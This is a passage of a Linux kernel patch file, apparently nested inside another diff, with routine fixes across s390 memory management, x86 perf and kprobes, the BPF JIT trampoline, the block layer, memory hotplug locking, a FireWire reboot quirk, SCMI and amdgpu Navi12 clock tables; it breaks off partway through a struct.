+diff --git a/arch/s390/mm/vmem.c b/arch/s390/mm/vmem.c
+index 9a0ce5315f36d..3cbb461820666 100644
+--- a/arch/s390/mm/vmem.c
++++ b/arch/s390/mm/vmem.c
+@@ -11,6 +11,7 @@
+ #include <linux/list.h>
+ #include <linux/hugetlb.h>
+ #include <linux/slab.h>
++#include <asm/page-states.h>
+ #include <asm/cacheflush.h>
+ #include <asm/nospec-branch.h>
+ #include <asm/pgalloc.h>
+@@ -44,8 +45,11 @@ void *vmem_crst_alloc(unsigned long val)
+ 	unsigned long *table;
+ 
+ 	table = vmem_alloc_pages(CRST_ALLOC_ORDER);
+-	if (table)
+-		crst_table_init(table, val);
++	if (!table)
++		return NULL;
++	crst_table_init(table, val);
++	if (slab_is_available())
++		arch_set_page_dat(virt_to_page(table), CRST_ALLOC_ORDER);
+ 	return table;
+ }
+ 
+diff --git a/arch/x86/events/intel/core.c b/arch/x86/events/intel/core.c
+index 2fb5e1541efc1..949129443b1c0 100644
+--- a/arch/x86/events/intel/core.c
++++ b/arch/x86/events/intel/core.c
+@@ -4033,12 +4033,17 @@ static struct perf_guest_switch_msr *intel_guest_get_msrs(int *nr, void *data)
+ 	u64 pebs_mask = cpuc->pebs_enabled & x86_pmu.pebs_capable;
+ 	int global_ctrl, pebs_enable;
+ 
++	/*
++	 * In addition to obeying exclude_guest/exclude_host, remove bits being
++	 * used for PEBS when running a guest, because PEBS writes to virtual
++	 * addresses (not physical addresses).
++	 */
+ 	*nr = 0;
+ 	global_ctrl = (*nr)++;
+ 	arr[global_ctrl] = (struct perf_guest_switch_msr){
+ 		.msr = MSR_CORE_PERF_GLOBAL_CTRL,
+ 		.host = intel_ctrl & ~cpuc->intel_ctrl_guest_mask,
+-		.guest = intel_ctrl & (~cpuc->intel_ctrl_host_mask | ~pebs_mask),
++		.guest = intel_ctrl & ~cpuc->intel_ctrl_host_mask & ~pebs_mask,
+ 	};
+ 
+ 	if (!x86_pmu.pebs)
+diff --git a/arch/x86/kernel/kprobes/core.c b/arch/x86/kernel/kprobes/core.c
+index ea155f0cf545c..6120f25b0d5cc 100644
+--- a/arch/x86/kernel/kprobes/core.c
++++ b/arch/x86/kernel/kprobes/core.c
+@@ -549,7 +549,8 @@ static void kprobe_emulate_call_indirect(struct kprobe *p, struct pt_regs *regs)
+ {
+ 	unsigned long offs = addrmode_regoffs[p->ainsn.indirect.reg];
+ 
+-	int3_emulate_call(regs, regs_get_register(regs, offs));
++	int3_emulate_push(regs, regs->ip - INT3_INSN_SIZE + p->ainsn.size);
++	int3_emulate_jmp(regs, regs_get_register(regs, offs));
+ }
+ NOKPROBE_SYMBOL(kprobe_emulate_call_indirect);
+ 
+diff --git a/arch/x86/net/bpf_jit_comp.c b/arch/x86/net/bpf_jit_comp.c
+index 4686c1d9d0cfd..b69aee6245e4a 100644
+--- a/arch/x86/net/bpf_jit_comp.c
++++ b/arch/x86/net/bpf_jit_comp.c
+@@ -893,6 +893,10 @@ static void emit_nops(u8 **pprog, int len)
+ 
+ #define INSN_SZ_DIFF (((addrs[i] - addrs[i - 1]) - (prog - temp)))
+ 
++/* mov rax, qword ptr [rbp - rounded_stack_depth - 8] */
++#define RESTORE_TAIL_CALL_CNT(stack)				\
++	EMIT3_off32(0x48, 0x8B, 0x85, -round_up(stack, 8) - 8)
++
+ static int do_jit(struct bpf_prog *bpf_prog, int *addrs, u8 *image, u8 *rw_image,
+ 		  int oldproglen, struct jit_context *ctx, bool jmp_padding)
+ {
+@@ -1436,9 +1440,7 @@ st:			if (is_imm8(insn->off))
+ 		case BPF_JMP | BPF_CALL:
+ 			func = (u8 *) __bpf_call_base + imm32;
+ 			if (tail_call_reachable) {
+-				/* mov rax, qword ptr [rbp - rounded_stack_depth - 8] */
+-				EMIT3_off32(0x48, 0x8B, 0x85,
+-					    -round_up(bpf_prog->aux->stack_depth, 8) - 8);
++				RESTORE_TAIL_CALL_CNT(bpf_prog->aux->stack_depth);
+ 				if (!imm32 || emit_call(&prog, func, image + addrs[i - 1] + 7))
+ 					return -EINVAL;
+ 			} else {
+@@ -1623,16 +1625,24 @@ emit_cond_jmp:		/* Convert BPF opcode to x86 */
+ 			break;
+ 
+ 		case BPF_JMP | BPF_JA:
+-			if (insn->off == -1)
+-				/* -1 jmp instructions will always jump
+-				 * backwards two bytes. Explicitly handling
+-				 * this case avoids wasting too many passes
+-				 * when there are long sequences of replaced
+-				 * dead code.
+-				 */
+-				jmp_offset = -2;
+-			else
+-				jmp_offset = addrs[i + insn->off] - addrs[i];
++		case BPF_JMP32 | BPF_JA:
++			if (BPF_CLASS(insn->code) == BPF_JMP) {
++				if (insn->off == -1)
++					/* -1 jmp instructions will always jump
++					 * backwards two bytes. Explicitly handling
++					 * this case avoids wasting too many passes
++					 * when there are long sequences of replaced
++					 * dead code.
++					 */
++					jmp_offset = -2;
++				else
++					jmp_offset = addrs[i + insn->off] - addrs[i];
++			} else {
++				if (insn->imm == -1)
++					jmp_offset = -2;
++				else
++					jmp_offset = addrs[i + insn->imm] - addrs[i];
++			}
+ 
+ 			if (!jmp_offset) {
+ 				/*
+@@ -1750,63 +1760,37 @@ emit_jmp:
+ 	return proglen;
+ }
+ 
+-static void save_regs(const struct btf_func_model *m, u8 **prog, int nr_args,
++static void save_regs(const struct btf_func_model *m, u8 **prog, int nr_regs,
+ 		      int stack_size)
+ {
+-	int i, j, arg_size, nr_regs;
++	int i;
++
+ 	/* Store function arguments to stack.
+ 	 * For a function that accepts two pointers the sequence will be:
+ 	 * mov QWORD PTR [rbp-0x10],rdi
+ 	 * mov QWORD PTR [rbp-0x8],rsi
+ 	 */
+-	for (i = 0, j = 0; i < min(nr_args, 6); i++) {
+-		if (m->arg_flags[i] & BTF_FMODEL_STRUCT_ARG) {
+-			nr_regs = (m->arg_size[i] + 7) / 8;
+-			arg_size = 8;
+-		} else {
+-			nr_regs = 1;
+-			arg_size = m->arg_size[i];
+-		}
+-
+-		while (nr_regs) {
+-			emit_stx(prog, bytes_to_bpf_size(arg_size),
+-				 BPF_REG_FP,
+-				 j == 5 ? X86_REG_R9 : BPF_REG_1 + j,
+-				 -(stack_size - j * 8));
+-			nr_regs--;
+-			j++;
+-		}
+-	}
++	for (i = 0; i < min(nr_regs, 6); i++)
++		emit_stx(prog, BPF_DW, BPF_REG_FP,
++			 i == 5 ? X86_REG_R9 : BPF_REG_1 + i,
++			 -(stack_size - i * 8));
+ }
+ 
+-static void restore_regs(const struct btf_func_model *m, u8 **prog, int nr_args,
++static void restore_regs(const struct btf_func_model *m, u8 **prog, int nr_regs,
+ 			 int stack_size)
+ {
+-	int i, j, arg_size, nr_regs;
++	int i;
+ 
+ 	/* Restore function arguments from stack.
+ 	 * For a function that accepts two pointers the sequence will be:
+ 	 * EMIT4(0x48, 0x8B, 0x7D, 0xF0); mov rdi,QWORD PTR [rbp-0x10]
+ 	 * EMIT4(0x48, 0x8B, 0x75, 0xF8); mov rsi,QWORD PTR [rbp-0x8]
+ 	 */
+-	for (i = 0, j = 0; i < min(nr_args, 6); i++) {
+-		if (m->arg_flags[i] & BTF_FMODEL_STRUCT_ARG) {
+-			nr_regs = (m->arg_size[i] + 7) / 8;
+-			arg_size = 8;
+-		} else {
+-			nr_regs = 1;
+-			arg_size = m->arg_size[i];
+-		}
+-
+-		while (nr_regs) {
+-			emit_ldx(prog, bytes_to_bpf_size(arg_size),
+-				 j == 5 ? X86_REG_R9 : BPF_REG_1 + j,
+-				 BPF_REG_FP,
+-				 -(stack_size - j * 8));
+-			nr_regs--;
+-			j++;
+-		}
+-	}
++	for (i = 0; i < min(nr_regs, 6); i++)
++		emit_ldx(prog, BPF_DW,
++			 i == 5 ? X86_REG_R9 : BPF_REG_1 + i,
++			 BPF_REG_FP,
++			 -(stack_size - i * 8));
+ }
+ 
+ static int invoke_bpf_prog(const struct btf_func_model *m, u8 **pprog,
+@@ -2031,8 +2015,8 @@ int arch_prepare_bpf_trampoline(struct bpf_tramp_image *im, void *image, void *i
+ 				struct bpf_tramp_links *tlinks,
+ 				void *func_addr)
+ {
+-	int ret, i, nr_args = m->nr_args, extra_nregs = 0;
+-	int regs_off, ip_off, args_off, stack_size = nr_args * 8, run_ctx_off;
++	int i, ret, nr_regs = m->nr_args, stack_size = 0;
++	int regs_off, nregs_off, ip_off, run_ctx_off;
+ 	struct bpf_tramp_links *fentry = &tlinks[BPF_TRAMP_FENTRY];
+ 	struct bpf_tramp_links *fexit = &tlinks[BPF_TRAMP_FEXIT];
+ 	struct bpf_tramp_links *fmod_ret = &tlinks[BPF_TRAMP_MODIFY_RETURN];
+@@ -2041,17 +2025,14 @@ int arch_prepare_bpf_trampoline(struct bpf_tramp_image *im, void *image, void *i
+ 	u8 *prog;
+ 	bool save_ret;
+ 
+-	/* x86-64 supports up to 6 arguments. 7+ can be added in the future */
+-	if (nr_args > 6)
+-		return -ENOTSUPP;
+-
+-	for (i = 0; i < MAX_BPF_FUNC_ARGS; i++) {
++	/* extra registers for struct arguments */
++	for (i = 0; i < m->nr_args; i++)
+ 		if (m->arg_flags[i] & BTF_FMODEL_STRUCT_ARG)
+-			extra_nregs += (m->arg_size[i] + 7) / 8 - 1;
+-	}
+-	if (nr_args + extra_nregs > 6)
++			nr_regs += (m->arg_size[i] + 7) / 8 - 1;
++
++	/* x86-64 supports up to 6 arguments. 7+ can be added in the future */
++	if (nr_regs > 6)
+ 		return -ENOTSUPP;
+-	stack_size += extra_nregs * 8;
+ 
+ 	/* Generated trampoline stack layout:
+ 	 *
+@@ -2065,11 +2046,12 @@ int arch_prepare_bpf_trampoline(struct bpf_tramp_image *im, void *image, void *i
+ 	 *                 [ ...             ]
+ 	 * RBP - regs_off  [ reg_arg1        ]  program's ctx pointer
+ 	 *
+-	 * RBP - args_off  [ arg regs count  ]  always
++	 * RBP - nregs_off [ regs count	     ]  always
+ 	 *
+ 	 * RBP - ip_off    [ traced function ]  BPF_TRAMP_F_IP_ARG flag
+ 	 *
+ 	 * RBP - run_ctx_off [ bpf_tramp_run_ctx ]
++	 * RSP                 [ tail_call_cnt ] BPF_TRAMP_F_TAIL_CALL_CTX
+ 	 */
+ 
+ 	/* room for return value of orig_call or fentry prog */
+@@ -2077,11 +2059,12 @@ int arch_prepare_bpf_trampoline(struct bpf_tramp_image *im, void *image, void *i
+ 	if (save_ret)
+ 		stack_size += 8;
+ 
++	stack_size += nr_regs * 8;
+ 	regs_off = stack_size;
+ 
+-	/* args count  */
++	/* regs count  */
+ 	stack_size += 8;
+-	args_off = stack_size;
++	nregs_off = stack_size;
+ 
+ 	if (flags & BPF_TRAMP_F_IP_ARG)
+ 		stack_size += 8; /* room for IP address argument */
+@@ -2106,14 +2089,16 @@ int arch_prepare_bpf_trampoline(struct bpf_tramp_image *im, void *image, void *i
+ 	EMIT1(0x55);		 /* push rbp */
+ 	EMIT3(0x48, 0x89, 0xE5); /* mov rbp, rsp */
+ 	EMIT4(0x48, 0x83, 0xEC, stack_size); /* sub rsp, stack_size */
++	if (flags & BPF_TRAMP_F_TAIL_CALL_CTX)
++		EMIT1(0x50);		/* push rax */
+ 	EMIT1(0x53);		 /* push rbx */
+ 
+ 	/* Store number of argument registers of the traced function:
+-	 *   mov rax, nr_args + extra_nregs
+-	 *   mov QWORD PTR [rbp - args_off], rax
++	 *   mov rax, nr_regs
++	 *   mov QWORD PTR [rbp - nregs_off], rax
+ 	 */
+-	emit_mov_imm64(&prog, BPF_REG_0, 0, (u32) nr_args + extra_nregs);
+-	emit_stx(&prog, BPF_DW, BPF_REG_FP, BPF_REG_0, -args_off);
++	emit_mov_imm64(&prog, BPF_REG_0, 0, (u32) nr_regs);
++	emit_stx(&prog, BPF_DW, BPF_REG_FP, BPF_REG_0, -nregs_off);
+ 
+ 	if (flags & BPF_TRAMP_F_IP_ARG) {
+ 		/* Store IP address of the traced function:
+@@ -2124,7 +2109,7 @@ int arch_prepare_bpf_trampoline(struct bpf_tramp_image *im, void *image, void *i
+ 		emit_stx(&prog, BPF_DW, BPF_REG_FP, BPF_REG_0, -ip_off);
+ 	}
+ 
+-	save_regs(m, &prog, nr_args, regs_off);
++	save_regs(m, &prog, nr_regs, regs_off);
+ 
+ 	if (flags & BPF_TRAMP_F_CALL_ORIG) {
+ 		/* arg1: mov rdi, im */
+@@ -2154,11 +2139,17 @@ int arch_prepare_bpf_trampoline(struct bpf_tramp_image *im, void *image, void *i
+ 	}
+ 
+ 	if (flags & BPF_TRAMP_F_CALL_ORIG) {
+-		restore_regs(m, &prog, nr_args, regs_off);
++		restore_regs(m, &prog, nr_regs, regs_off);
++
++		if (flags & BPF_TRAMP_F_TAIL_CALL_CTX)
++			/* Before calling the original function, restore the
++			 * tail_call_cnt from stack to rax.
++			 */
++			RESTORE_TAIL_CALL_CNT(stack_size);
+ 
+ 		if (flags & BPF_TRAMP_F_ORIG_STACK) {
+-			emit_ldx(&prog, BPF_DW, BPF_REG_0, BPF_REG_FP, 8);
+-			EMIT2(0xff, 0xd0); /* call *rax */
++			emit_ldx(&prog, BPF_DW, BPF_REG_6, BPF_REG_FP, 8);
++			EMIT2(0xff, 0xd3); /* call *rbx */
+ 		} else {
+ 			/* call original function */
+ 			if (emit_call(&prog, orig_call, prog)) {
+@@ -2195,7 +2186,7 @@ int arch_prepare_bpf_trampoline(struct bpf_tramp_image *im, void *image, void *i
+ 		}
+ 
+ 	if (flags & BPF_TRAMP_F_RESTORE_REGS)
+-		restore_regs(m, &prog, nr_args, regs_off);
++		restore_regs(m, &prog, nr_regs, regs_off);
+ 
+ 	/* This needs to be done regardless. If there were fmod_ret programs,
+ 	 * the return value is only updated on the stack and still needs to be
+@@ -2209,7 +2200,12 @@ int arch_prepare_bpf_trampoline(struct bpf_tramp_image *im, void *image, void *i
+ 			ret = -EINVAL;
+ 			goto cleanup;
+ 		}
+-	}
++	} else if (flags & BPF_TRAMP_F_TAIL_CALL_CTX)
++		/* Before running the original function, restore the
++		 * tail_call_cnt from stack to rax.
++		 */
++		RESTORE_TAIL_CALL_CNT(stack_size);
++
+ 	/* restore return value of orig_call or fentry prog back into RAX */
+ 	if (save_ret)
+ 		emit_ldx(&prog, BPF_DW, BPF_REG_0, BPF_REG_FP, -8);
+diff --git a/block/bdev.c b/block/bdev.c
+index d699ecdb32604..b61502ec8da06 100644
+--- a/block/bdev.c
++++ b/block/bdev.c
+@@ -507,6 +507,8 @@ struct block_device *bdev_alloc(struct gendisk *disk, u8 partno)
+ 
+ void bdev_add(struct block_device *bdev, dev_t dev)
+ {
++	if (bdev_stable_writes(bdev))
++		mapping_set_stable_writes(bdev->bd_inode->i_mapping);
+ 	bdev->bd_dev = dev;
+ 	bdev->bd_inode->i_rdev = dev;
+ 	bdev->bd_inode->i_ino = dev;
+diff --git a/block/blk-mq.c b/block/blk-mq.c
+index 100fb0c3114f8..383d94615e502 100644
+--- a/block/blk-mq.c
++++ b/block/blk-mq.c
+@@ -2855,11 +2855,8 @@ static struct request *blk_mq_get_new_requests(struct request_queue *q,
+ 	};
+ 	struct request *rq;
+ 
+-	if (unlikely(bio_queue_enter(bio)))
+-		return NULL;
+-
+ 	if (blk_mq_attempt_bio_merge(q, bio, nsegs))
+-		goto queue_exit;
++		return NULL;
+ 
+ 	rq_qos_throttle(q, bio);
+ 
+@@ -2875,35 +2872,23 @@ static struct request *blk_mq_get_new_requests(struct request_queue *q,
+ 	rq_qos_cleanup(q, bio);
+ 	if (bio->bi_opf & REQ_NOWAIT)
+ 		bio_wouldblock_error(bio);
+-queue_exit:
+-	blk_queue_exit(q);
+ 	return NULL;
+ }
+ 
+-static inline struct request *blk_mq_get_cached_request(struct request_queue *q,
+-		struct blk_plug *plug, struct bio **bio, unsigned int nsegs)
++/* return true if this @rq can be used for @bio */
++static bool blk_mq_can_use_cached_rq(struct request *rq, struct blk_plug *plug,
++		struct bio *bio)
+ {
+-	struct request *rq;
+-	enum hctx_type type, hctx_type;
++	enum hctx_type type = blk_mq_get_hctx_type(bio->bi_opf);
++	enum hctx_type hctx_type = rq->mq_hctx->type;
+ 
+-	if (!plug)
+-		return NULL;
+-	rq = rq_list_peek(&plug->cached_rq);
+-	if (!rq || rq->q != q)
+-		return NULL;
+-
+-	if (blk_mq_attempt_bio_merge(q, *bio, nsegs)) {
+-		*bio = NULL;
+-		return NULL;
+-	}
++	WARN_ON_ONCE(rq_list_peek(&plug->cached_rq) != rq);
+ 
+-	type = blk_mq_get_hctx_type((*bio)->bi_opf);
+-	hctx_type = rq->mq_hctx->type;
+ 	if (type != hctx_type &&
+ 	    !(type == HCTX_TYPE_READ && hctx_type == HCTX_TYPE_DEFAULT))
+-		return NULL;
+-	if (op_is_flush(rq->cmd_flags) != op_is_flush((*bio)->bi_opf))
+-		return NULL;
++		return false;
++	if (op_is_flush(rq->cmd_flags) != op_is_flush(bio->bi_opf))
++		return false;
+ 
+ 	/*
+ 	 * If any qos ->throttle() end up blocking, we will have flushed the
+@@ -2911,11 +2896,11 @@ static inline struct request *blk_mq_get_cached_request(struct request_queue *q,
+ 	 * before we throttle.
+ 	 */
+ 	plug->cached_rq = rq_list_next(rq);
+-	rq_qos_throttle(q, *bio);
++	rq_qos_throttle(rq->q, bio);
+ 
+-	rq->cmd_flags = (*bio)->bi_opf;
++	rq->cmd_flags = bio->bi_opf;
+ 	INIT_LIST_HEAD(&rq->queuelist);
+-	return rq;
++	return true;
+ }
+ 
+ static void bio_set_ioprio(struct bio *bio)
+@@ -2944,7 +2929,7 @@ void blk_mq_submit_bio(struct bio *bio)
+ 	struct request_queue *q = bdev_get_queue(bio->bi_bdev);
+ 	struct blk_plug *plug = blk_mq_plug(bio);
+ 	const int is_sync = op_is_sync(bio->bi_opf);
+-	struct request *rq;
++	struct request *rq = NULL;
+ 	unsigned int nr_segs = 1;
+ 	blk_status_t ret;
+ 
+@@ -2955,20 +2940,36 @@ void blk_mq_submit_bio(struct bio *bio)
+ 			return;
+ 	}
+ 
+-	if (!bio_integrity_prep(bio))
+-		return;
+-
+ 	bio_set_ioprio(bio);
+ 
+-	rq = blk_mq_get_cached_request(q, plug, &bio, nr_segs);
+-	if (!rq) {
+-		if (!bio)
++	if (plug) {
++		rq = rq_list_peek(&plug->cached_rq);
++		if (rq && rq->q != q)
++			rq = NULL;
++	}
++	if (rq) {
++		if (!bio_integrity_prep(bio))
+ 			return;
+-		rq = blk_mq_get_new_requests(q, plug, bio, nr_segs);
+-		if (unlikely(!rq))
++		if (blk_mq_attempt_bio_merge(q, bio, nr_segs))
+ 			return;
++		if (blk_mq_can_use_cached_rq(rq, plug, bio))
++			goto done;
++		percpu_ref_get(&q->q_usage_counter);
++	} else {
++		if (unlikely(bio_queue_enter(bio)))
++			return;
++		if (!bio_integrity_prep(bio))
++			goto fail;
++	}
++
++	rq = blk_mq_get_new_requests(q, plug, bio, nr_segs);
++	if (unlikely(!rq)) {
++fail:
++		blk_queue_exit(q);
++		return;
+ 	}
+ 
++done:
+ 	trace_block_getrq(bio);
+ 
+ 	rq_qos_track(q, rq, bio);
+diff --git a/block/fops.c b/block/fops.c
+index 6197d1c41652d..01cb6260fa24d 100644
+--- a/block/fops.c
++++ b/block/fops.c
+@@ -655,24 +655,35 @@ static long blkdev_fallocate(struct file *file, int mode, loff_t start,
+ 
+ 	filemap_invalidate_lock(inode->i_mapping);
+ 
+-	/* Invalidate the page cache, including dirty pages. */
+-	error = truncate_bdev_range(bdev, file->f_mode, start, end);
+-	if (error)
+-		goto fail;
+-
++	/*
++	 * Invalidate the page cache, including dirty pages, for valid
++	 * de-allocate mode calls to fallocate().
++	 */
+ 	switch (mode) {
+ 	case FALLOC_FL_ZERO_RANGE:
+ 	case FALLOC_FL_ZERO_RANGE | FALLOC_FL_KEEP_SIZE:
++		error = truncate_bdev_range(bdev, file->f_mode, start, end);
++		if (error)
++			goto fail;
++
+ 		error = blkdev_issue_zeroout(bdev, start >> SECTOR_SHIFT,
+ 					     len >> SECTOR_SHIFT, GFP_KERNEL,
+ 					     BLKDEV_ZERO_NOUNMAP);
+ 		break;
+ 	case FALLOC_FL_PUNCH_HOLE | FALLOC_FL_KEEP_SIZE:
++		error = truncate_bdev_range(bdev, file->f_mode, start, end);
++		if (error)
++			goto fail;
++
+ 		error = blkdev_issue_zeroout(bdev, start >> SECTOR_SHIFT,
+ 					     len >> SECTOR_SHIFT, GFP_KERNEL,
+ 					     BLKDEV_ZERO_NOFALLBACK);
+ 		break;
+ 	case FALLOC_FL_PUNCH_HOLE | FALLOC_FL_KEEP_SIZE | FALLOC_FL_NO_HIDE_STALE:
++		error = truncate_bdev_range(bdev, file->f_mode, start, end);
++		if (error)
++			goto fail;
++
+ 		error = blkdev_issue_discard(bdev, start >> SECTOR_SHIFT,
+ 					     len >> SECTOR_SHIFT, GFP_KERNEL);
+ 		break;
+diff --git a/drivers/base/memory.c b/drivers/base/memory.c
+index 9aa0da991cfb9..5d39f3e374dae 100644
+--- a/drivers/base/memory.c
++++ b/drivers/base/memory.c
+@@ -175,6 +175,9 @@ int memory_notify(unsigned long val, void *v)
+ 	return blocking_notifier_call_chain(&memory_chain, val, v);
+ }
+ 
++/*
++ * Must acquire mem_hotplug_lock in write mode.
++ */
+ static int memory_block_online(struct memory_block *mem)
+ {
+ 	unsigned long start_pfn = section_nr_to_pfn(mem->start_section_nr);
+@@ -193,10 +196,11 @@ static int memory_block_online(struct memory_block *mem)
+ 	 * stage helps to keep accounting easier to follow - e.g vmemmaps
+ 	 * belong to the same zone as the memory they backed.
+ 	 */
++	mem_hotplug_begin();
+ 	if (nr_vmemmap_pages) {
+ 		ret = mhp_init_memmap_on_memory(start_pfn, nr_vmemmap_pages, zone);
+ 		if (ret)
+-			return ret;
++			goto out;
+ 	}
+ 
+ 	ret = online_pages(start_pfn + nr_vmemmap_pages,
+@@ -204,7 +208,7 @@ static int memory_block_online(struct memory_block *mem)
+ 	if (ret) {
+ 		if (nr_vmemmap_pages)
+ 			mhp_deinit_memmap_on_memory(start_pfn, nr_vmemmap_pages);
+-		return ret;
++		goto out;
+ 	}
+ 
+ 	/*
+@@ -216,9 +220,14 @@ static int memory_block_online(struct memory_block *mem)
+ 					  nr_vmemmap_pages);
+ 
+ 	mem->zone = zone;
++out:
++	mem_hotplug_done();
+ 	return ret;
+ }
+ 
++/*
++ * Must acquire mem_hotplug_lock in write mode.
++ */
+ static int memory_block_offline(struct memory_block *mem)
+ {
+ 	unsigned long start_pfn = section_nr_to_pfn(mem->start_section_nr);
+@@ -233,6 +242,7 @@ static int memory_block_offline(struct memory_block *mem)
+ 	 * Unaccount before offlining, such that unpopulated zone and kthreads
+ 	 * can properly be torn down in offline_pages().
+ 	 */
++	mem_hotplug_begin();
+ 	if (nr_vmemmap_pages)
+ 		adjust_present_page_count(pfn_to_page(start_pfn), mem->group,
+ 					  -nr_vmemmap_pages);
+@@ -244,13 +254,15 @@ static int memory_block_offline(struct memory_block *mem)
+ 		if (nr_vmemmap_pages)
+ 			adjust_present_page_count(pfn_to_page(start_pfn),
+ 						  mem->group, nr_vmemmap_pages);
+-		return ret;
++		goto out;
+ 	}
+ 
+ 	if (nr_vmemmap_pages)
+ 		mhp_deinit_memmap_on_memory(start_pfn, nr_vmemmap_pages);
+ 
+ 	mem->zone = NULL;
++out:
++	mem_hotplug_done();
+ 	return ret;
+ }
+ 
+diff --git a/drivers/firewire/ohci.c b/drivers/firewire/ohci.c
+index 17c9d825188bb..667ff40f39353 100644
+--- a/drivers/firewire/ohci.c
++++ b/drivers/firewire/ohci.c
+@@ -279,6 +279,51 @@ static char ohci_driver_name[] = KBUILD_MODNAME;
+ #define QUIRK_TI_SLLZ059		0x20
+ #define QUIRK_IR_WAKE			0x40
+ 
++// On PCI Express Root Complex in any type of AMD Ryzen machine, VIA VT6306/6307/6308 with Asmedia
++// ASM1083/1085 brings an inconvenience that the read accesses to 'Isochronous Cycle Timer' register
++// (at offset 0xf0 in PCI I/O space) often causes unexpected system reboot. The mechanism is not
++// clear, since the read access to the other registers is enough safe; e.g. 'Node ID' register,
++// while it is probable due to detection of any type of PCIe error.
++#define QUIRK_REBOOT_BY_CYCLE_TIMER_READ	0x80000000
++
++#if IS_ENABLED(CONFIG_X86)
++
++static bool has_reboot_by_cycle_timer_read_quirk(const struct fw_ohci *ohci)
++{
++	return !!(ohci->quirks & QUIRK_REBOOT_BY_CYCLE_TIMER_READ);
++}
++
++#define PCI_DEVICE_ID_ASMEDIA_ASM108X	0x1080
++
++static bool detect_vt630x_with_asm1083_on_amd_ryzen_machine(const struct pci_dev *pdev)
++{
++	const struct pci_dev *pcie_to_pci_bridge;
++
++	// Detect any type of AMD Ryzen machine.
++	if (!static_cpu_has(X86_FEATURE_ZEN))
++		return false;
++
++	// Detect VIA VT6306/6307/6308.
++	if (pdev->vendor != PCI_VENDOR_ID_VIA)
++		return false;
++	if (pdev->device != PCI_DEVICE_ID_VIA_VT630X)
++		return false;
++
++	// Detect Asmedia ASM1083/1085.
++	pcie_to_pci_bridge = pdev->bus->self;
++	if (pcie_to_pci_bridge->vendor != PCI_VENDOR_ID_ASMEDIA)
++		return false;
++	if (pcie_to_pci_bridge->device != PCI_DEVICE_ID_ASMEDIA_ASM108X)
++		return false;
++
++	return true;
++}
++
++#else
++#define has_reboot_by_cycle_timer_read_quirk(ohci) false
++#define detect_vt630x_with_asm1083_on_amd_ryzen_machine(pdev)	false
++#endif
++
+ /* In case of multiple matches in ohci_quirks[], only the first one is used. */
+ static const struct {
+ 	unsigned short vendor, device, revision, flags;
+@@ -1713,6 +1758,9 @@ static u32 get_cycle_time(struct fw_ohci *ohci)
+ 	s32 diff01, diff12;
+ 	int i;
+ 
++	if (has_reboot_by_cycle_timer_read_quirk(ohci))
++		return 0;
++
+ 	c2 = reg_read(ohci, OHCI1394_IsochronousCycleTimer);
+ 
+ 	if (ohci->quirks & QUIRK_CYCLE_TIMER) {
+@@ -3615,6 +3663,9 @@ static int pci_probe(struct pci_dev *dev,
+ 	if (param_quirks)
+ 		ohci->quirks = param_quirks;
+ 
++	if (detect_vt630x_with_asm1083_on_amd_ryzen_machine(dev))
++		ohci->quirks |= QUIRK_REBOOT_BY_CYCLE_TIMER_READ;
++
+ 	/*
+ 	 * Because dma_alloc_coherent() allocates at least one page,
+ 	 * we save space by using a common buffer for the AR request/
+diff --git a/drivers/firmware/arm_scmi/perf.c b/drivers/firmware/arm_scmi/perf.c
+index 431bda9165c3d..2775bcafe40f6 100644
+--- a/drivers/firmware/arm_scmi/perf.c
++++ b/drivers/firmware/arm_scmi/perf.c
+@@ -131,7 +131,7 @@ struct perf_dom_info {
+ 	u32 opp_count;
+ 	u32 sustained_freq_khz;
+ 	u32 sustained_perf_level;
+-	u32 mult_factor;
++	unsigned long mult_factor;
+ 	char name[SCMI_MAX_STR_SIZE];
+ 	struct scmi_opp opp[MAX_OPPS];
+ 	struct scmi_fc_info *fc_info;
+@@ -223,8 +223,8 @@ scmi_perf_domain_attributes_get(const struct scmi_protocol_handle *ph,
+ 			dom_info->mult_factor =	1000;
+ 		else
+ 			dom_info->mult_factor =
+-					(dom_info->sustained_freq_khz * 1000) /
+-					dom_info->sustained_perf_level;
++					(dom_info->sustained_freq_khz * 1000UL)
++					/ dom_info->sustained_perf_level;
+ 		strscpy(dom_info->name, attr->name, SCMI_SHORT_NAME_MAX_SIZE);
+ 	}
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+index 8a1b84aaaf717..a5352e5e2bd47 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+@@ -1976,15 +1976,8 @@ static int amdgpu_device_parse_gpu_info_fw(struct amdgpu_device *adev)
+ 
+ 	adev->firmware.gpu_info_fw = NULL;
+ 
+-	if (adev->mman.discovery_bin) {
+-		/*
+-		 * FIXME: The bounding box is still needed by Navi12, so
+-		 * temporarily read it from gpu_info firmware. Should be dropped
+-		 * when DAL no longer needs it.
+-		 */
+-		if (adev->asic_type != CHIP_NAVI12)
+-			return 0;
+-	}
++	if (adev->mman.discovery_bin)
++		return 0;
+ 
+ 	switch (adev->asic_type) {
+ 	default:
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn20/dcn20_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn20/dcn20_fpu.c
+index 9d224bb2b3df6..ce893fe1c69f4 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn20/dcn20_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn20/dcn20_fpu.c
+@@ -438,7 +438,115 @@ struct _vcs_dpi_soc_bounding_box_st dcn2_0_nv14_soc = {
+ 	.use_urgent_burst_bw = 0
+ };
+ 
+-struct _vcs_dpi_soc_bounding_box_st dcn2_0_nv12_soc = { 0 };
++struct _vcs_dpi_soc_bounding_box_st dcn2_0_nv12_soc = {
++	.clock_limits = {
++		{
++			.state = 0,
++			.dcfclk_mhz = 560.0,
++			.fabricclk_mhz = 560.0,
++			.dispclk_mhz = 513.0,
++			.dppclk_mhz = 513.0,
++			.phyclk_mhz = 540.0,
++			.socclk_mhz = 560.0,
++			.dscclk_mhz = 171.0,
++			.dram_speed_mts = 1069.0,
++		},
++		{
++			.state = 1,
++			.dcfclk_mhz = 694.0,
++			.fabricclk_mhz = 694.0,
++			.dispclk_mhz = 642.0,
++			.dppclk_mhz = 642.0,
++			.phyclk_mhz = 600.0,
++			.socclk_mhz = 694.0,
++			.dscclk_mhz = 214.0,
++			.dram_speed_mts = 1324.0,
++		},
++		{
++			.state = 2,
++			.dcfclk_mhz = 875.0,
++			.fabricclk_mhz = 875.0,
